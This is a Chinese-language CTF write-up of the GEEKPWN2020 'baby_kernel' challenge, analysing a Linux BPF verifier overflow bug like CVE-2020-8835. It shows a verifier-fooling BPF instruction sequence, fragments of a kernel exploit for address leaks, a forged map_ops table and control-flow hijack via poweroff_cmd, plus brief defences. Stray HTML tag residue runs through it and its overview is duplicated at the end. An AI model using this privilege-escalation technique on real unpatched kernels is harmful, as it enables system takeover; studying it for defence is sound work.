Linux内核BPF子系统漏洞分析与利用<\/h1>

漏洞概述<\/h2>
本教学文档分析的是GEEKPWN2020云安全挑战赛决赛中的`baby_kernel<\/code>题目，涉及Linux内核BPF子系统的漏洞利用。该漏洞与CVE-2020-8835类似，都是由于BPF验证器(verifier)在算术运算时缺少溢出检查导致的。<\/p>`

漏洞分析<\/h2>
漏洞位置<\/h3>
漏洞位于verifier.c<\/code>文件中的scalar_min_max_add<\/code>函数，缺少了对算术运算溢出的检查。调用链如下：<\/p>
do_check -> check_alu_op -> adjust_reg_min_max_vals -> adjust_scalar_min_max_vals -> scalar_min_max_add
<\/code><\/pre>
关键代码片段：<\/p>
static<\/span> int<\/span> adjust_scalar_min_max_vals<\/span>(struct<\/span> bpf_verifier_env *<\/span>env,
<\/span><\/span>                    struct<\/span> bpf_insn *<\/span>insn,
<\/span><\/span>                    struct<\/span> bpf_reg_state *<\/span>dst_reg,
<\/span><\/span>                    struct<\/span> bpf_reg_state src_reg)
<\/span><\/span>{
<\/span><\/span>    switch<\/span> (opcode) {
<\/span><\/span>    case<\/span> BPF_ADD:
<\/span><\/span>        ret =<\/span> sanitize_val_alu(env, insn);
<\/span><\/span>        if<\/span> (ret <<\/span> 0<\/span>) {
<\/span><\/span>            verbose(env, "R%d tried to add from different pointers or scalars<\/span>\n<\/span>"<\/span>, dst);
<\/span><\/span>            return<\/span> ret;
<\/span><\/span>        }
<\/span><\/span>        scalar32_min_max_add(dst_reg, &<\/span>src_reg);
<\/span><\/span>        scalar_min_max_add(dst_reg, &<\/span>src_reg);
<\/span><\/span>        dst_reg-><\/span>var_off =<\/span> tnum_add(dst_reg-><\/span>var_off, src_reg.var_off);
<\/span><\/span>        break<\/span>;
<\/span><\/span>    \/\/...
<\/span><\/span><\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>漏洞原理<\/h3>
BPF验证器在计算寄存器值的范围(smin_val<\/code>和smax_val<\/code>)时，使用32位截断计算，导致可以欺骗验证器认为寄存器值的范围与实际不同。具体来说：<\/p>

初始时寄存器的smin_val<\/code>和smax_val<\/code>分别为S64_MIN<\/code>(0x8000000000000000)和S64_MAX<\/code>(0x7fffffffffffffff)<\/li>
通过一系列算术运算(加、移位等)，可以使验证器认为寄存器的值为0<\/li>
但实际上可以传入非零值，绕过验证器的检查<\/li>
<\/ol>
关键BPF指令序列<\/h3>
以下BPF指令序列可以欺骗验证器：<\/p>
BPF_ALU64_IMM(BPF_ADD,8<\/span>,1<\/span>),    \/\/ r8 += 1
<\/span><\/span><\/span><\/span>BPF_ALU64_IMM(BPF_RSH,8<\/span>,1<\/span>),    \/\/ r8 >> 1
<\/span><\/span><\/span><\/span>BPF_ALU64_IMM(BPF_LSH,8<\/span>,1<\/span>),    \/\/ r8 << 1
<\/span><\/span><\/span><\/span>BPF_ALU64_REG(BPF_ADD,8<\/span>,8<\/span>),     \/\/ r8 += r8 (overflow)
<\/span><\/span><\/span><\/span>BPF_ALU64_IMM(BPF_RSH,8<\/span>,32<\/span>),   \/\/ r8 >>= 32
<\/span><\/span><\/span><\/span>BPF_ALU64_IMM(BPF_MUL,8<\/span>,0x110<\/span>\/<\/span>2<\/span>) \/\/ r8 *= 0x110
<\/span><\/span><\/span><\/code><\/pre>验证器认为最终r8<\/code>的值为0，但实际上如果初始值为0x100000000，经过计算会得到0x110，可用于越界访问。<\/p>
漏洞利用<\/h2>
利用步骤<\/h3>


地址泄露<\/strong>：<\/p>

利用越界读取获取array_map_ops<\/code>地址，计算KASLR偏移<\/li>
泄露map地址<\/li>
<\/ul>
<\/li>

任意地址写<\/strong>：<\/p>

伪造map_ops<\/code>结构，将map_push_elem<\/code>改为array_map_get_next_key<\/code><\/li>
设置map_type<\/code>为BPF_MAP_TYPE_STACK<\/code>，max_entries<\/code>为-1<\/li>
通过map_update_elem<\/code>触发任意写<\/li>
<\/ul>
<\/li>

控制流劫持<\/strong>：<\/p>

劫持security_task_prctl<\/code>函数指针<\/li>
修改为poweroff_work_func<\/code>地址<\/li>
修改poweroff_cmd<\/code>为要执行的命令<\/li>
<\/ul>
<\/li>
<\/ol>
关键数据结构<\/h3>

bpf_array结构<\/strong>：<\/li>
<\/ol>
struct<\/span> bpf_array {
<\/span><\/span>    struct<\/span> bpf_map map;
<\/span><\/span>    u32 elem_size;
<\/span><\/span>    u32 index_mask;
<\/span><\/span>    struct<\/span> bpf_array_aux *<\/span>aux;
<\/span><\/span>    union<\/span> {
<\/span><\/span>        char<\/span> value[0<\/span>];
<\/span><\/span>        void<\/span> *<\/span>ptrs[0<\/span>];
<\/span><\/span>        void<\/span> *<\/span>pptrs[0<\/span>];
<\/span><\/span>    };
<\/span><\/span>};
<\/span><\/span><\/code><\/pre>
bpf_map_ops结构<\/strong>：<\/li>
<\/ol>
struct<\/span> bpf_map_ops {
<\/span><\/span>    \/* funcs callable from userspace *\/<\/span>
<\/span><\/span>    int<\/span> (*<\/span>map_alloc_check)(...);
<\/span><\/span>    struct<\/span> bpf_map *<\/span>(*<\/span>map_alloc)(...);
<\/span><\/span>    void<\/span> (*<\/span>map_release)(...);
<\/span><\/span>    void<\/span> (*<\/span>map_free)(...);
<\/span><\/span>    int<\/span> (*<\/span>map_get_next_key)(...);
<\/span><\/span>    \/\/...
<\/span><\/span><\/span><\/span>};
<\/span><\/span><\/code><\/pre>利用代码关键部分<\/h3>

地址泄露<\/strong>：<\/li>
<\/ol>
BPF_LDX_MEM(BPF_DW, 0<\/span>, 7<\/span>, 0<\/span>),      \/\/ r0 = [r7+0]
<\/span><\/span><\/span><\/span>BPF_STX_MEM(BPF_DW, 6<\/span>, 0<\/span>, 0x10<\/span>),   \/\/ r6+0x10 = r0 = ctrl_map[2]
<\/span><\/span><\/span><\/span>BPF_LDX_MEM(BPF_DW, 0<\/span>, 7<\/span>, 0xc8<\/span>),   \/\/ r0 = [r7+0xc0]
<\/span><\/span><\/span><\/span>BPF_STX_MEM(BPF_DW, 6<\/span>, 0<\/span>, 0x18<\/span>),   \/\/ r6+0x18 = r0 = ctrl_map[3]
<\/span><\/span><\/span><\/code><\/pre>
伪造map_ops<\/strong>：<\/li>
<\/ol>
uint64_t<\/span> fake_map_ops[] =<\/span> {
<\/span><\/span>    kaslr +<\/span> 0xffffffff81162ef0<\/span>,    \/\/ map_alloc_check
<\/span><\/span><\/span><\/span>    kaslr +<\/span> 0xffffffff81163df0<\/span>,    \/\/ map_alloc
<\/span><\/span><\/span><\/span>    0x0<\/span>,
<\/span><\/span>    kaslr +<\/span> 0xffffffff811636c0<\/span>,    \/\/ map_free
<\/span><\/span><\/span><\/span>    kaslr +<\/span> 0xffffffff81162fe0<\/span>,    \/\/ get_next_key (原map_push_elem位置)
<\/span><\/span><\/span><\/span>    \/\/...
<\/span><\/span><\/span><\/span>};
<\/span><\/span><\/code><\/pre>
控制流劫持<\/strong>：<\/li>
<\/ol>
\/\/ 修改security_task_prctl函数指针
<\/span><\/span><\/span><\/span>expbuf64[0<\/span>] =<\/span> (poweroff_work_func &<\/span> 0xffffffff<\/span>) -<\/span> 1<\/span>;
<\/span><\/span>bpf_update_elem(expmapfd, &<\/span>key, expbuf, hp_hook);
<\/span><\/span>
<\/span><\/span>\/\/ 修改poweroff_cmd为"\/bin\/chmod 777 \/flag"
<\/span><\/span><\/span><\/span>expbuf64[0<\/span>] =<\/span> 0x6e69622f<\/span> -<\/span> 1<\/span>;  \/\/ "\/bin"
<\/span><\/span><\/span><\/span>bpf_update_elem(expmapfd, &<\/span>key, expbuf, poweroff_cmd);
<\/span><\/span><\/code><\/pre>防御措施<\/h2>

在scalar_min_max_add<\/code>等算术运算函数中添加溢出检查<\/li>
加强BPF验证器对寄存器值范围的跟踪<\/li>
使用更严格的边界检查<\/li>
启用KASLR和SMAP\/SMEP等防护机制<\/li>
<\/ol>
总结<\/h2>
该漏洞利用BPF验证器在算术运算时缺少溢出检查的特性，通过精心构造的BPF指令序列欺骗验证器，最终实现任意地址读写和控制流劫持。利用过程中需要深入理解BPF验证器的工作原理和内核数据结构，是一道综合性很强的内核漏洞利用题目。<\/p>

Linux内核BPF子系统漏洞分析与利用<\/h1>

漏洞概述<\/h2> 本教学文档分析的是GEEKPWN2020云安全挑战赛决赛中的baby_kernel<\/code>题目，涉及Linux内核BPF子系统的漏洞利用。该漏洞与CVE-2020-8835类似，都是由于BPF验证器(verifier)在算术运算时缺少溢出检查导致的。<\/p>

漏洞概述<\/h2>
本教学文档分析的是GEEKPWN2020云安全挑战赛决赛中的`baby_kernel<\/code>题目，涉及Linux内核BPF子系统的漏洞利用。该漏洞与CVE-2020-8835类似，都是由于BPF验证器(verifier)在算术运算时缺少溢出检查导致的。<\/p>`